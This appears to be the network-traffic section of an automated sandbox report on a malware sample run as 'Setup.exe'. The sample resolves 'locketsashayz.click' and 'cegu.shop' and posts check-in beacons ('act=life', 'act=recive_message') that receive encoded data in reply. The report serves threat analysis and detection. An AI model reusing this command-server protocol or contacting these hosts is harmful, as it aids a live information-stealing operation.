                                                                                                      Jan 1, 2025 16:56:25.342969894 CET49735443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:25.343291044 CET49735443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:25.343310118 CET44349735188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:25.800389051 CET44349735188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:25.800458908 CET49735443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:25.801732063 CET49735443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:25.801748037 CET44349735188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:25.802006960 CET44349735188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:25.803320885 CET49735443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:25.803370953 CET49735443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:25.803407907 CET44349735188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:30.386774063 CET44349735188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:30.386863947 CET44349735188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:30.386907101 CET49735443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:30.387149096 CET49735443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:30.387176037 CET44349735188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:30.603182077 CET49740443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:30.603245974 CET44349740188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:30.603323936 CET49740443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:30.603598118 CET49740443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:30.603609085 CET44349740188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:31.060374975 CET44349740188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:31.060447931 CET49740443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:31.061857939 CET49740443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:31.061870098 CET44349740188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:31.062127113 CET44349740188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:31.070656061 CET49740443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:31.070820093 CET49740443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:31.070842981 CET44349740188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:31.070903063 CET49740443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:31.070910931 CET44349740188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:31.709590912 CET44349740188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:31.709676981 CET44349740188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:31.709887981 CET49740443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:31.710131884 CET49740443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:31.710148096 CET44349740188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:32.736170053 CET49741443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:32.736217022 CET44349741188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:32.736284971 CET49741443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:32.736669064 CET49741443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:32.736677885 CET44349741188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:33.202022076 CET44349741188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:33.202101946 CET49741443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:33.210484028 CET49741443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:33.210495949 CET44349741188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:33.210813999 CET44349741188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:33.211906910 CET49741443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:33.212054014 CET49741443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:33.212070942 CET44349741188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:34.097760916 CET44349741188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:34.097846031 CET44349741188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:34.097919941 CET49741443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:34.098086119 CET49741443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:34.098107100 CET44349741188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:34.232173920 CET49742443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:34.232229948 CET44349742188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:34.232312918 CET49742443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:34.232589960 CET49742443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:34.232604027 CET44349742188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:34.766465902 CET44349742188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:34.766558886 CET49742443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:34.802192926 CET49742443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:34.802227974 CET44349742188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:34.802531004 CET44349742188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:34.811588049 CET49742443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:34.811656952 CET49742443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:34.811666012 CET44349742188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:35.522154093 CET44349742188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:35.522244930 CET44349742188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:35.522294044 CET49742443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:35.522433043 CET49742443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:35.522452116 CET44349742188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:35.972893953 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:35.972953081 CET44349743188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:35.973356962 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:35.973356962 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:35.973402977 CET44349743188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:36.458833933 CET44349743188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:36.458976030 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:36.460387945 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:36.460405111 CET44349743188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:36.460622072 CET44349743188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:36.462723017 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:36.462723017 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:36.462770939 CET44349743188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:36.463514090 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:36.463553905 CET44349743188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:36.464538097 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:36.464585066 CET44349743188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:36.464915991 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:36.464955091 CET44349743188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:36.465275049 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:36.465307951 CET44349743188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:36.465466976 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:36.465495110 CET44349743188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:36.465503931 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:36.465516090 CET44349743188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:36.465692043 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:36.465715885 CET44349743188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:36.465740919 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:36.465909958 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:36.465939045 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:36.473650932 CET44349743188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:36.477093935 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:36.477129936 CET44349743188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:36.477157116 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:36.477194071 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:36.477353096 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:36.478533030 CET44349743188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:38.124366045 CET44349743188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:38.124465942 CET44349743188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:38.125014067 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:38.125190973 CET49743443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:38.125211954 CET44349743188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:38.156989098 CET49744443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:38.157049894 CET44349744188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:38.157289982 CET49744443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:38.157668114 CET49744443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:38.157684088 CET44349744188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:38.632189035 CET44349744188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:38.632282972 CET49744443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:38.633755922 CET49744443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:38.633766890 CET44349744188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:38.633970022 CET44349744188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:38.635232925 CET49744443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:38.635246992 CET49744443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:38.635288954 CET44349744188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:39.103025913 CET44349744188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:39.103115082 CET44349744188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:39.103177071 CET49744443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:39.103404045 CET49744443192.168.2.4188.114.97.3
                                                                                                      Jan 1, 2025 16:56:39.103426933 CET44349744188.114.97.3192.168.2.4
                                                                                                      Jan 1, 2025 16:56:39.166307926 CET49745443192.168.2.4185.161.251.21
                                                                                                      Jan 1, 2025 16:56:39.166347980 CET44349745185.161.251.21192.168.2.4
                                                                                                      Jan 1, 2025 16:56:39.166580915 CET49745443192.168.2.4185.161.251.21
                                                                                                      Jan 1, 2025 16:56:39.168109894 CET49745443192.168.2.4185.161.251.21
                                                                                                      Jan 1, 2025 16:56:39.168119907 CET44349745185.161.251.21192.168.2.4
                                                                                                      Jan 1, 2025 16:56:39.907763958 CET44349745185.161.251.21192.168.2.4
                                                                                                      Jan 1, 2025 16:56:39.907938957 CET49745443192.168.2.4185.161.251.21
                                                                                                      Jan 1, 2025 16:56:39.913368940 CET49745443192.168.2.4185.161.251.21
                                                                                                      Jan 1, 2025 16:56:39.913378000 CET44349745185.161.251.21192.168.2.4
                                                                                                      Jan 1, 2025 16:56:39.913681984 CET44349745185.161.251.21192.168.2.4
                                                                                                      Jan 1, 2025 16:56:39.916039944 CET49745443192.168.2.4185.161.251.21
                                                                                                      Jan 1, 2025 16:56:39.963340044 CET44349745185.161.251.21192.168.2.4
                                                                                                      Jan 1, 2025 16:56:40.175007105 CET44349745185.161.251.21192.168.2.4
                                                                                                      Jan 1, 2025 16:56:40.175081968 CET44349745185.161.251.21192.168.2.4
                                                                                                      Jan 1, 2025 16:56:40.175262928 CET49745443192.168.2.4185.161.251.21
                                                                                                      Jan 1, 2025 16:56:40.175537109 CET49745443192.168.2.4185.161.251.21
                                                                                                      Jan 1, 2025 16:56:40.175558090 CET44349745185.161.251.21192.168.2.4
                                                                                                      Jan 1, 2025 16:56:40.175575018 CET49745443192.168.2.4185.161.251.21
                                                                                                      Jan 1, 2025 16:56:40.175580978 CET44349745185.161.251.21192.168.2.4

                                                                                                      UDP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Jan 1, 2025 16:56:21.423703909 CET5686053192.168.2.41.1.1.1
                                                                                                      Jan 1, 2025 16:56:21.436892986 CET53568601.1.1.1192.168.2.4
                                                                                                      Jan 1, 2025 16:56:39.105029106 CET6107353192.168.2.41.1.1.1
                                                                                                      Jan 1, 2025 16:56:39.164027929 CET53610731.1.1.1192.168.2.4

                                                                                                      DNS Queries

                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      Jan 1, 2025 16:56:21.423703909 CET192.168.2.41.1.1.10x4f54Standard query (0)locketsashayz.clickA (IP address)IN (0x0001)false
                                                                                                      Jan 1, 2025 16:56:39.105029106 CET192.168.2.41.1.1.10xcf4cStandard query (0)cegu.shopA (IP address)IN (0x0001)false

                                                                                                      DNS Answers

                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                      Jan 1, 2025 16:56:21.436892986 CET1.1.1.1192.168.2.40x4f54No error (0)locketsashayz.click188.114.97.3A (IP address)IN (0x0001)false
                                                                                                      Jan 1, 2025 16:56:21.436892986 CET1.1.1.1192.168.2.40x4f54No error (0)locketsashayz.click188.114.96.3A (IP address)IN (0x0001)false
                                                                                                      Jan 1, 2025 16:56:39.164027929 CET1.1.1.1192.168.2.40xcf4cNo error (0)cegu.shop185.161.251.21A (IP address)IN (0x0001)false

                                                                                                      HTTP Request Dependency Graph

                                                                                                      • locketsashayz.click
                                                                                                      • cegu.shop

                                                                                                      HTTPS Proxied Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.449730188.114.97.34436984C:\Users\user\Desktop\Setup.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-01 15:56:21 UTC266OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 8
                                                                                                      Host: locketsashayz.click
                                                                                                      2025-01-01 15:56:21 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                      Data Ascii: act=life
                                                                                                      2025-01-01 15:56:22 UTC1125INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 01 Jan 2025 15:56:22 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=mqrc2qatpmvgeqi2n18vudvpd9; expires=Sun, 27 Apr 2025 09:43:01 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bm63NidoglZi0XKe66hsxyH8Mjv2vnbkcFIF71CZcI3C9lqWZFr76WXBKI7P%2BNHnw8KQVTqcdKWPwCO5a9%2FeY4PZiuXIwbEPml2%2FsjUR0Ial09rXEy0AB9bqRPBIKYbrua9fpiTe"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8fb3b2ed9b2b4229-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1746&min_rtt=1734&rtt_var=675&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=910&delivery_rate=1591280&cwnd=236&unsent_bytes=0&cid=daf394de9060f4f9&ts=773&x=0"
                                                                                                      2025-01-01 15:56:22 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                      Data Ascii: 2ok
                                                                                                      2025-01-01 15:56:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.449731188.114.97.34436984C:\Users\user\Desktop\Setup.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-01 15:56:23 UTC267OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 78
                                                                                                      Host: locketsashayz.click
                                                                                                      2025-01-01 15:56:23 UTC78OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37
                                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--TRON&j=637b55279021aab33278188cfa638397
                                                                                                      2025-01-01 15:56:23 UTC1127INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 01 Jan 2025 15:56:23 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=9fvv2lbsh49d3l3flata0l9te3; expires=Sun, 27 Apr 2025 09:43:02 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5ZPYDxRodoLmDZnwIQlTEw%2FtYQNnhtlgyfOQULpe3oTzniqVCz7GemRCLIpbwVXNPC%2BlTbug%2BzCasWTldmohg6s16QITpR2CFFHymEIvm%2B1SFQVh80gCYlu82wgbruoMI7zhXQxZ"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8fb3b2f5485572c2-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1794&min_rtt=1782&rtt_var=692&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=981&delivery_rate=1554018&cwnd=164&unsent_bytes=0&cid=d403ba37974b9e94&ts=482&x=0"
                                                                                                      2025-01-01 15:56:23 UTC242INData Raw: 34 36 38 0d 0a 6d 33 39 6b 6a 4b 61 77 33 72 65 56 38 46 47 33 74 44 70 30 2f 49 6b 7a 70 7a 66 42 4e 42 33 64 49 42 4b 59 32 4a 54 70 38 53 48 67 58 52 4b 75 6e 49 54 79 6c 65 61 56 63 34 33 41 53 41 47 5a 70 52 48 47 55 2b 4d 4f 65 37 78 4d 59 66 33 30 74 70 2b 63 41 36 45 5a 42 65 44 56 31 66 4b 56 38 49 68 7a 6a 65 39 42 56 70 6e 6e 45 5a 30 56 70 46 35 2f 76 45 78 77 2b 62 50 37 6d 5a 31 43 38 78 4d 44 35 4d 50 54 75 74 62 35 6e 54 54 53 30 56 73 65 6b 75 42 65 7a 31 72 6a 47 44 2b 34 57 6a 43 69 2b 74 6d 4d 68 55 44 57 48 68 66 6e 68 4d 33 79 7a 4c 65 56 50 35 57 4f 47 42 57 5a 36 31 2f 42 55 36 70 63 64 62 56 45 63 66 79 79 35 49 43 58 53 66 4d 64 41 4f 58 4a 32 71 37 62 38 35 6f 2f 31 4e 74 62 56 74 43 72 56
                                                                                                      Data Ascii: 468m39kjKaw3reV8FG3tDp0/IkzpzfBNB3dIBKY2JTp8SHgXRKunITyleaVc43ASAGZpRHGU+MOe7xMYf30tp+cA6EZBeDV1fKV8Ihzje9BVpnnEZ0VpF5/vExw+bP7mZ1C8xMD5MPTutb5nTTS0VsekuBez1rjGD+4WjCi+tmMhUDWHhfnhM3yzLeVP5WOGBWZ61/BU6pcdbVEcfyy5ICXSfMdAOXJ2q7b85o/1NtbVtCrV
                                                                                                      2025-01-01 15:56:23 UTC893INData Raw: 74 30 56 2b 78 59 73 6a 55 46 68 36 36 2f 37 6d 35 55 44 35 6c 4d 66 72 73 50 65 2f 49 32 33 6d 6a 2f 62 30 31 73 5a 6d 65 70 52 31 31 71 6a 56 58 65 33 52 6e 72 31 74 66 6d 46 6d 55 54 78 46 41 48 68 77 39 71 36 32 76 54 53 66 5a 58 52 51 46 62 47 71 33 48 56 56 71 42 43 63 71 34 43 62 37 53 6a 74 6f 79 66 41 36 46 64 41 4f 44 46 33 37 7a 48 2f 35 6b 34 30 4d 52 54 48 35 50 6d 55 63 68 66 72 46 56 2f 75 45 68 36 39 62 44 79 68 70 35 46 2b 52 31 47 6f 49 54 56 70 4a 57 76 30 68 44 51 78 6c 38 61 69 4b 6c 72 68 55 72 74 54 7a 2b 34 54 6a 43 69 2b 76 36 4f 6b 45 44 79 45 67 58 6d 7a 38 43 38 78 2f 47 66 4e 73 66 51 58 52 69 55 36 45 50 50 57 36 56 56 64 72 52 4c 64 66 32 2b 74 73 58 54 52 4f 46 64 58 71 37 6c 33 37 66 5a 2f 59 55 7a 6c 63 6b 57 44 39 37 73
                                                                                                      Data Ascii: t0V+xYsjUFh66/7m5UD5lMfrsPe/I23mj/b01sZmepR11qjVXe3Rnr1tfmFmUTxFAHhw9q62vTSfZXRQFbGq3HVVqBCcq4Cb7SjtoyfA6FdAODF37zH/5k40MRTH5PmUchfrFV/uEh69bDyhp5F+R1GoITVpJWv0hDQxl8aiKlrhUrtTz+4TjCi+v6OkEDyEgXmz8C8x/GfNsfQXRiU6EPPW6VVdrRLdf2+tsXTROFdXq7l37fZ/YUzlckWD97s
                                                                                                      2025-01-01 15:56:23 UTC1369INData Raw: 34 61 66 65 0d 0a 49 35 33 6c 58 38 4a 44 34 30 6b 78 70 67 4a 33 39 76 71 75 79 35 78 4d 39 68 55 47 37 38 44 66 75 4e 54 36 6e 6a 72 57 32 6c 51 65 6b 2b 64 56 79 6c 32 72 56 58 65 74 54 48 37 38 76 50 61 4f 30 77 32 35 47 68 36 75 6e 4a 4b 59 32 2b 43 47 4f 4a 66 6a 57 78 69 51 37 45 65 46 53 75 31 50 50 37 68 4f 4d 4b 4c 36 2b 49 61 59 54 2f 34 55 42 2b 33 45 32 4c 4c 61 2f 5a 6f 37 31 64 74 5a 48 5a 62 74 58 4d 35 61 72 46 46 33 76 45 35 31 39 37 6d 32 78 64 4e 45 34 56 31 65 72 75 48 63 76 38 54 6d 30 41 62 57 32 46 59 52 69 4b 74 4f 69 30 7a 6a 55 58 50 2f 47 6a 44 77 76 66 47 50 6e 6b 6e 36 47 51 4c 6a 79 39 75 31 33 4f 57 59 50 39 76 45 56 52 79 62 35 56 33 41 57 71 4e 58 66 72 46 49 65 37 72 30 74 6f 79 4c 41 36 46 64 4b 65 50 55 77 4c 62 65 35
                                                                                                      Data Ascii: 4afeI53lX8JD40kxpgJ39vquy5xM9hUG78DfuNT6njrW2lQek+dVyl2rVXetTH78vPaO0w25Gh6unJKY2+CGOJfjWxiQ7EeFSu1PP7hOMKL6+IaYT/4UB+3E2LLa/Zo71dtZHZbtXM5arFF3vE5197m2xdNE4V1eruHcv8Tm0AbW2FYRiKtOi0zjUXP/GjDwvfGPnkn6GQLjy9u13OWYP9vEVRyb5V3AWqNXfrFIe7r0toyLA6FdKePUwLbe5
                                                                                                      2025-01-01 15:56:23 UTC1369INData Raw: 52 51 46 62 47 71 33 37 47 51 36 6b 57 59 50 46 62 4d 50 32 32 74 74 50 54 53 66 55 5a 42 65 4c 4e 33 72 48 55 38 35 55 2b 30 64 5a 65 45 4a 76 71 57 73 31 5a 72 46 78 7a 75 30 35 35 2f 4c 62 31 69 4a 55 44 74 31 30 42 39 6f 53 4b 2f 50 54 36 6d 54 2f 56 31 55 6b 52 33 71 55 52 79 31 4f 6a 46 69 65 70 55 6d 66 39 70 62 69 53 30 30 54 31 58 56 36 75 7a 73 43 35 32 2f 4f 59 4e 74 48 61 55 68 61 62 2b 56 6e 44 55 71 39 65 65 72 42 45 64 66 65 39 2f 59 69 42 55 66 6f 5a 43 4f 4b 45 6e 50 7a 53 37 39 4a 72 6c 66 4e 50 46 59 37 74 55 6f 56 4b 37 55 38 2f 75 45 34 77 6f 76 72 32 68 5a 39 49 2f 68 59 4e 36 73 44 53 73 64 37 35 6e 44 72 5a 33 6c 51 52 6a 4f 5a 55 7a 56 2b 71 55 33 4f 79 51 57 4c 35 75 37 62 46 30 30 54 68 58 56 36 75 34 2b 47 4c 39 72 65 4e 66 63
                                                                                                      Data Ascii: RQFbGq37GQ6kWYPFbMP22ttPTSfUZBeLN3rHU85U+0dZeEJvqWs1ZrFxzu055/Lb1iJUDt10B9oSK/PT6mT/V1UkR3qURy1OjFiepUmf9pbiS00T1XV6uzsC52/OYNtHaUhab+VnDUq9eerBEdfe9/YiBUfoZCOKEnPzS79JrlfNPFY7tUoVK7U8/uE4wovr2hZ9I/hYN6sDSsd75nDrZ3lQRjOZUzV+qU3OyQWL5u7bF00ThXV6u4+GL9reNfc
                                                                                                      2025-01-01 15:56:23 UTC1369INData Raw: 33 72 4d 52 36 56 61 73 58 54 2b 67 44 47 6d 36 76 66 72 4c 79 77 50 2b 46 51 37 67 78 39 53 33 32 66 75 54 4f 74 50 54 55 42 47 52 37 46 6a 43 56 61 56 45 65 4c 4a 4c 63 50 47 7a 2f 49 2b 53 53 4c 6c 54 52 75 6e 63 6b 75 53 56 78 5a 55 6c 78 64 55 59 43 64 44 79 45 63 4a 5a 34 77 34 2f 73 6c 42 78 2f 36 6a 79 68 4a 68 52 38 68 73 47 36 39 62 56 73 4e 2f 34 6b 54 76 59 31 56 41 45 6e 75 5a 52 31 30 65 6c 58 58 48 2f 44 44 44 39 6f 72 62 54 30 33 4c 75 46 6b 62 78 69 73 76 38 30 76 76 53 61 35 58 56 55 68 75 51 2b 56 58 44 58 71 42 59 64 37 70 4b 64 50 43 33 2b 59 43 5a 53 76 45 64 43 65 76 4d 32 62 72 62 39 70 51 2f 32 4a 59 57 56 70 6e 7a 45 5a 30 56 68 45 78 79 75 56 56 68 7a 37 33 32 32 74 4e 63 74 77 52 47 36 63 69 53 35 4a 58 36 6e 6a 6e 59 30 31 77
                                                                                                      Data Ascii: 3rMR6VasXT+gDGm6vfrLywP+FQ7gx9S32fuTOtPTUBGR7FjCVaVEeLJLcPGz/I+SSLlTRunckuSVxZUlxdUYCdDyEcJZ4w4/slBx/6jyhJhR8hsG69bVsN/4kTvY1VAEnuZR10elXXH/DDD9orbT03LuFkbxisv80vvSa5XVUhuQ+VXDXqBYd7pKdPC3+YCZSvEdCevM2brb9pQ/2JYWVpnzEZ0VhExyuVVhz7322tNctwRG6ciS5JX6njnY01w
